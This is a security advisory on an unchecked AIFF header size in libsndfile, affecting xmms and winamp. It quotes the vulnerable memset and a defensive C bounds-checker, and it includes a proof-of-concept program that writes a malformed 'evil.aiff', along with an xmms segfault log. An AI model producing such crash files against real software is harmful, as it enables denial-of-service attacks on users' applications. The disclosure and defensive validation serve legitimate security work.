-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
libsndfile AIFF buffer unverified
A security issue affects the following library/software releases:
libsndfile <= 1.0.17
xmms-sndfile <= 1.2_4
winamp <= 5.541
and possibly more.
- -BACKGROUND
Libsndfile is a C library for reading and writing files containing sampled
sound (such as MS Windows WAV and the Apple/SGI AIFF format) through one
standard library interface.
- -DESCRIPTION
Testing and debugging winamp, I have verified that the bug is specific to
the libsndfile library. I saw that some of the functions that read AIFF
file headers do not check the limits of (CommonChunk.ckSize). There may be
other functions with the same problem. One of the errors occurs when memset
is called with an unverified size that exceeds the limit of memory.
Quoted code segment at src/aiff.c:847
============================================================
else if (comm_fmt->size >= SIZEOF_AIFC_COMM)
{
    // some lines omitted
    memset (psf->u.scbuf, 0, comm_fmt->size) ;
============================================================
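As an added example (not code from this advisory or from libsndfile), the following C parser walks the IFF chunk list, finds the COMM chunk and rejects a ckSize that is smaller than the COMM body, larger than the scratch buffer it would be copied into, or larger than the bytes remaining in the file, before that size reaches any memset or read. The quoted libsndfile code only checks the lower bound (>= SIZEOF_AIFC_COMM); the two upper bounds are the missing checks. The scratch buffer size SCBUF_SIZE, the function and status names, and the embedded sample inputs are assumptions made for this example: the first input reproduces the byte layout of the advisory's evil.aiff, the second is a constructed well-formed 16-bit mono AIFF header.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of the scratch buffer a COMM chunk is copied into
 * (stands in for psf->u.scbuf; the real size is not stated in the advisory). */
#define SCBUF_SIZE 64
/* Body of an AIFF COMM chunk: numChannels(2) numSampleFrames(4)
 * sampleSize(2) sampleRate(10-byte extended float) = 18 bytes. */
#define MIN_COMM_SIZE 18

enum aiff_status {
    AIFF_OK = 0,
    AIFF_NOT_AIFF,       /* missing FORM/AIFF/AIFC magic */
    AIFF_TRUNCATED,      /* a chunk header or body runs past the data */
    AIFF_BAD_COMM_SIZE   /* COMM ckSize fails the bounds checks */
};

static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Walk the chunk list and validate the COMM chunk's ckSize before it is
 * used as a length for memset/fread. Returns AIFF_OK and stores the
 * validated size in *comm_size on success. */
enum aiff_status aiff_check_comm(const unsigned char *buf, size_t len,
                                 uint32_t *comm_size)
{
    size_t pos = 12;   /* first chunk follows "FORM", form size, "AIFF" */

    if (len < 12)
        return AIFF_TRUNCATED;
    if (memcmp(buf, "FORM", 4) != 0 ||
        (memcmp(buf + 8, "AIFF", 4) != 0 && memcmp(buf + 8, "AIFC", 4) != 0))
        return AIFF_NOT_AIFF;

    while (pos + 8 <= len) {
        const unsigned char *ck = buf + pos;
        uint32_t cksize = be32(ck + 4);
        size_t remaining = len - (pos + 8);   /* bytes after this chunk header */

        if (memcmp(ck, "COMM", 4) == 0) {
            /* Lower bound as in the original, plus the two upper bounds that
             * keep memset(scbuf, 0, cksize) inside scbuf and inside the file. */
            if (cksize < MIN_COMM_SIZE || cksize > SCBUF_SIZE || cksize > remaining)
                return AIFF_BAD_COMM_SIZE;
            if (comm_size)
                *comm_size = cksize;
            return AIFF_OK;
        }
        /* Skip any other chunk; IFF pads odd-sized chunk bodies to even length. */
        if (cksize > remaining)
            return AIFF_TRUNCATED;
        pos += 8 + cksize + (cksize & 1);
    }
    return AIFF_TRUNCATED;   /* no COMM chunk within the data */
}

/* Constructed input 1: same byte layout as the advisory's evil.aiff.
 * The COMM ckSize field is 0x41414141, far beyond both the file and scbuf. */
static const unsigned char page_poc[] =
    "FORM" "\x00\x04\xcd\xec" "AIFF"
    "COMM" "\x41\x41\x41\x41"
    "AAAAAAAAAAAAA" "AAAAAAAAAAAAA" "AAAAAAAAAAAAA" "AAAAAAAAAAAAA"  /* 52 filler bytes */
    "\x20\x5e\x01\x18\x0f\x3c\x0e\xe4" "\x00";

/* Constructed input 2: a well-formed header, 16-bit mono at 44100 Hz. */
static const unsigned char sane_aiff[] =
    "FORM" "\x00\x00\x00\x1a" "AIFF"
    "COMM" "\x00\x00\x00\x12"                    /* ckSize = 18 */
    "\x00\x01" "\x00\x00\x00\x00" "\x00\x10"     /* 1 channel, 0 frames, 16 bits */
    "\x40\x0e\xac\x44\x00\x00\x00\x00\x00\x00";  /* 44100.0 as 80-bit extended */

enum aiff_status check_page_poc(void)
{
    uint32_t s = 0;
    return aiff_check_comm(page_poc, sizeof page_poc - 1, &s);
}

enum aiff_status check_sane(void)
{
    uint32_t s = 0;
    return aiff_check_comm(sane_aiff, sizeof sane_aiff - 1, &s);
}

/* Validated COMM size of the sane header, or 0 if it is rejected. */
uint32_t sane_comm_size(void)
{
    uint32_t s = 0;
    if (aiff_check_comm(sane_aiff, sizeof sane_aiff - 1, &s) != AIFF_OK)
        return 0;
    return s;
}

/* The sane header cut off after 30 bytes: ckSize says 18 but only 10 remain. */
enum aiff_status check_truncated(void)
{
    uint32_t s = 0;
    return aiff_check_comm(sane_aiff, 30, &s);
}

int main(void)
{
    printf("evil.aiff layout: status %d\n", (int)check_page_poc());
    printf("sane header:      status %d, COMM size %u\n",
           (int)check_sane(), (unsigned)sane_comm_size());
    printf("truncated header: status %d\n", (int)check_truncated());
    return 0;
}
```

The check against the bytes remaining in the file matters as much as the scratch-buffer cap: a ckSize that fits the buffer but overruns the file would otherwise make the subsequent read fail in a less obvious way.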
- -CODE
============================================================
#include <stdio.h>
#include <stdlib.h>

#define AIFFSIZE 81

/* "FORM", form size, "AIFF", then a "COMM" chunk whose ckSize field is
 * 0x41414141 (the unverified value), followed by filler bytes. */
const char *aiffbuff =
"\x46\x4f\x52\x4d\x00\x04\xcd\xec\x41\x49\x46\x46\x43\x4f\x4d\x4d\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x5e\x01\x18\x0f\x3c\x0e\xe4"
"\x00";

int main(void) {
    FILE *aiff = fopen("evil.aiff", "wb");   /* binary mode: no newline translation */
    if (aiff == NULL) {
        perror("fopen");
        return EXIT_FAILURE;
    }
    fwrite(aiffbuff, AIFFSIZE, 1, aiff);
    fclose(aiff);
    return EXIT_SUCCESS;
}
============================================================
When these applications process the file with the invalid headers, they
stop with an unexpected error; tcsh sample:
============================================================
Anon@localhost % xmms -v
xmms 1.2.11
Anon@localhost % xmms -p evil.aiff
Segmentation fault
You've probably found a bug in XMMS, please visit
http://bugs.xmms.org and fill out a bug report.
============================================================
- -IMPACT
Just for fun, but nothing beyond a Denial of Service against any program
that uses the library.
Regards,
Anon[at]elhacker.net
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (FreeBSD)
iQCVAwUBSZbcxT0RloP1tHX9AQIfTQP/aqqzwsVwQow4U4D1lzM0CYIVymjYmL7+
k1qmq4cypYyaSCYUt9KXBIh52hWYFtFfMlrYnREgbf+zDIgme6syUkU7EfE567ah
1tXhjJdYlC3CrKc6t2psUqyuhHBDU8YVyLyuTvTvWykQjVRKJUlfvNEeB97CVvHe
rrl8KwnEItk=
=FNmo
-----END PGP SIGNATURE-----